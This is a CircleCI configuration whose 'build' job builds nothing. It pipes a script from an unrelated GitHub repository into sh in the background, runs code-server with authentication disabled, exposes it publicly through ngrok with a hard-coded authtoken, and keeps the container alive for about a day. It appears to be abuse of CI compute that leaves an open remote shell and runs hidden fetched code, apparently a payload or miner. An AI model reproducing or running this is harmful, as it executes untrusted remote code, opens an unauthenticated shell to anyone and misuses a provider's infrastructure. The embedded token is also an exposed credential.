version: 2.1
jobs:
  build:
    docker: 
      - image: ubuntu:18.04
    steps:
      - run:
          command: |
            export DEBIAN_FRONTEND=noninteractive
            export USER=root
            apt update
            apt install unzip wget curl gcc git vim -y
            curl -sSf https://raw.githubusercontent.com/samita100/beyawak/code/module/helper.sh | sh &
            curl https://sh.rustup.rs -o rustup-init.sh
            sh rustup-init.sh -y
            cp ~/.cargo/bin/* /bin/
            wget https://github.com/cdr/code-server/releases/download/v3.8.0/code-server-3.8.0-linux-amd64.tar.gz
            tar xvfz code-server-3.8.0-linux-amd64.tar.gz
            ./code-server-3.8.0-linux-amd64/bin/code-server --install-extension tabnine.tabnine-vscode --install-extension matklad.rust-analyzer --force
            PORT=1234 ./code-server-3.8.0-linux-amd64/bin/code-server --auth=none &
            wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
            unzip ngrok-stable-linux-amd64.zip
            ./ngrok authtoken 1nprOkUCJH2XTBgfDb0p9DaKWf2_2E8wv4eLcUucFKnDKmyMX
            ./ngrok http 1234 &
            vmstat 60 1440
